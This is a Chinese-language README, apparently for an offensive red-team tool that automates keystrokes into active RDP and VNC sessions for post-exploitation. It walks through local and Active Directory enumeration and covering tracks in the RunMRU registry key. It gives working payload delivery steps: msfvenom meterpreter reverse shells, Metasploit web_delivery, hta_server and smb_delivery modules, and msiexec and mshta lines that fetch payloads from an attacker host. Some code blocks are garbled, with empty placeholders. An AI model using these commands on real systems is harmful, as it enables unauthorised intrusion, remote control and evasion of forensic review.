一个通过活动远程桌面会话自动化击键的脚本,协助攻击操作人员结合利用系统自身技术(living off the land)。所有功劳归于 nopernik 使其成为可能,于是我决定自行对其改进。我希望有一个工具能在后渗透阶段通过远程桌面执行命令时提供帮助。同时,该脚本也为制作 SCPA 项目以有组织的方式收集资源提供了可能。
根据你的包管理器安装其余依赖项。``` $ sudo apt install -y xfreerdp-x11 remmina xdotool
$ sudo dnf install -y xdotool freerdp-2 remmina
$ sudo pacman -S freerdp remmina xdotool
$ sudo emerge xwayland freerdp remmina xdotool
$ sudo nix-env -iA nixpkgs.xwayland nixpkgs.xdotool nixpkgs.freerdp nixpkgs.remmina
### 设置
在系统中安装程序,并将 `rks` 创建为 `remotekeystrokes` 的符号链接。这将用作命令别名。```
$ sudo wget -O /usr/local/src/remotekeystrokes.sh https://raw.githubusercontent.com/U53RW4R3/RemoteKeyStrokes/main/remotekeystrokes.sh && \
sudo ln -sf /usr/local/src/remotekeystrokes.sh /usr/local/bin/remotekeystrokes && \
sudo ln -sf /usr/local/src/remotekeystrokes.sh /usr/local/bin/rks && \
sudo chmod 755 /usr/local/src/remotekeystrokes.sh /usr/local/bin/remotekeystrokes /usr/local/bin/rks
$ remotekeystrokes -h Usage: remotekeystrokes
Flags:
COMMON OPTIONS: -c, --command <command | file> Specify a command or a file contains commands to execute
-p, --platform <operating_system> Specify the operating system ("windows" is
set by default if not specified)
-w, --windowname <window_name> Specify the window name to focus on the
active window ("freerdp" is set by default
if not specified)
-h, --help Display this help message
UPLOAD FILES: -i, --input <input_file> Specify the local input file to transfer -o, --output <output_file> Specify the remote output file to transfer
METHODS: -m, --method Specify a method. For command execution method "none" is set by default if not specified. For file transfer "pwshb64" is set by default if not specified. Other available methods are: "elevate", "persistence", "antiforensics", and "mayhem"
-s, --submethod <submethod> Specify a submethod from a method (applies
with -m flag)
-a, --action <action> Specify an action from a method and/or
submethod (applies with -m and/or -s flag)
-e, --evasion <evasion> Specify an evasion method for uploading files
(only works for "pwshb64")
## 用法
### 0x00 - 远程认证
#### 图例
- 美元符号 (`$`) 表示具有普通用户权限的 Unix shell 提示符,并且包含命令。
- 尖括号 (`<>`) 表示必需参数。
- 方括号 (`[]`) 表示可选参数(如非必需指定)。
#### RDP
要对现代操作系统进行身份验证,请指定标志以强制使用 TLS 身份验证 `/sec:tls` 或 NLA 身份验证 `/sec:nla`。```
$ xfreerdp /kbd:US /clipboard /compression /dynamic-resolution /sec:<tls | nla> [/d:"<domain_name>"] /u:"<username>" /p:"<password>" /v:<IP>:[<PORT>]
为了对旧版操作系统进行身份验证,请指定标志 /sec:rdp 以强制使用旧版身份验证。```
$ xfreerdp /kbd:US /clipboard /compression /dynamic-resolution /sec:rdp [/d:"<domain_name>"] /u:"" /p:"" /v::[]
#### VNC
用于远程认证VNC机器。```
$ remmina -c vnc://<username>:<password>@<IP>
$ ssh [-p ] @
#### Telnet```
$ telnet <IP> [PORT]
要使用 remotekeystrokes(或别名命令 rks)在通过认证的远程会话中在 Windows 目标上执行命令,首先需要通过窗口名称(-w)进行导航,默认情况下使用 xfreerdp 时会搜索 FreeRDP。如果目标系统使用不同的远程登录程序,请务必指定窗口名称。使用 -c 标志来发出命令。你也可以准备一个文本文件,在其中插入命令,它会逐条读取这些命令。该标志会检查输入的是字符串还是文件。
适用于图形化远程桌面程序,例如 FreeRDP、Remmina 及其他第三方程序。与 telnet 和 ssh 等远程终端会话不同,你必须将光标定位到目标机器内的一个活动应用程序上。例如,在 Windows 环境中,你必须打开命令提示符(cmd.exe)或 PowerShell(powershell.exe)。Windows 可以通过对话框(-m dialogbox)快速启动程序。请确保在你最初使用该方法执行后,清除注册表中的痕迹。该痕迹位于 HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU。你将看到如何仅通过 Living off the Land(LotL)技术执行快速攻击性措施的示例。
本地机器枚举。``` $ cat recon_local_enum_cmds.txt whoami /all net user net localgroup Administrators ipconfig /all systeminfo
$ rks -c "cmd.exe" -m dialogbox [] Checking one of the lines reaches 260 character limit [] Executing commands... [+] Task completed!
$ rks -c recon_local_enum_cmds.txt [*] Executing commands... [+] Task completed!
用单个命令即可执行。当与对话框一起使用时,这尤其简洁。```
$ rks -c "cmd.exe /k \"whoami /all & net user & net localgroup Administrators & ipconfig /all & systeminfo\"" -m dialogbox
[*] Checking one of the lines reaches 260 character limit
[*] Executing commands...
[+] Task completed!
Active Directory 枚举。``` $ cat recon_ad_enum_cmds.txt net user /domain net group "Domain Admins" /domain net group "Enterprise Admins" /domain net group "Domain Computers" /domain
$ rks -c "cmd.exe" -m dialogbox [] Checking one of the lines reaches 260 character limit [] Executing commands... [+] Task completed!
$ rks -c recon_ad_enum_cmds.txt [*] Executing commands... [+] Task completed!
在单个命令中执行。这在使用对话框时尤其简洁。```
$ rks -c "cmd.exe /k \"net user /domain & net group \"Domain Admins\" /domain & net group \"Enterprise Admins\" /domain & net group \"Domain Computers\" /domain\""
[*] Checking one of the lines reaches 260 character limit
[*] Executing commands...
[+] Task completed!
本地机器枚举 (TODO)``` $ cat recon_local_enum_cmdlets.txt
$ rks -c "powershell.exe" -m dialogbox
$ rks -c recon_local_enum_cmdlets.txt
Active directory enumeration (TODO)```
$ cat recon_ad_enum_cmdlets.txt
$ rks -c "powershell.exe" -m dialogbox
$ rks -c recon_ad_enum_cmdlets.txt
在执行载荷的同时读取 PowerShell 的内容。``` $ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost= lport= -f psh -o payload.ps1
$ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost ; set lport ; run"
$ rks -c "powershell.exe" -m dialogbox
$ rks -c payload.ps1
使用 `metasploit-framework` 的漏洞利用模块 `exploit/multi/script/web_delivery` 执行一个 PowerShell 单行载荷。```
$ sudo msfconsole -qx "use exploit/multi/script/web_delivery; set target 2; set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP>; set lport 8443; set srvhost <server_IP>; set srvport <server_PORT>; set uripath payload; run"
$ rks -c "cmd.exe" -m dialogbox
$ rks -c "powershell.exe -nop -w hidden -e <base64_payload>"
在托管 Web 服务器时,使用 msiexec.exe 执行载荷。```
$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost= lport= -f msi -o payload.msi
$ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost ; set lport ; run"
$ sudo python -m http.server 80
$ rks -c "msiexec /quiet /qn /i http://<attacker_IP>/payload.msi" -m dialogbox
使用 `metasploit-framework` 的漏洞利用模块 `exploit/windows/misc/hta_server`,通过 `mshta.exe` 执行负载。
```mshta.exe``````
$ sudo msfconsole -qx "use exploit/windows/misc/hta_server; set target 2; set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP>; set lport 8443; set srvhost <server_IP>; set srvhost <server_IP>; set srvport <server_PORT> run"
$ rks -c "mshta.exe http://<attacker_IP>:<attacker_PORT>/payload.hta" -m dialogbox
使用 metasploit-framework 的漏洞利用模块 exploit/windows/smb/smb_delivery 通过 rundll32.exe 执行 payload。```
$ sudo msfconsole -qx "use exploit/windows/smb/smb_delivery; set payload windows/x64/meterpreter/reverse_tcp; set lhost ; set lport 8443; set srvhost <server_IP>; set file_name payload.dll; set share staging; run"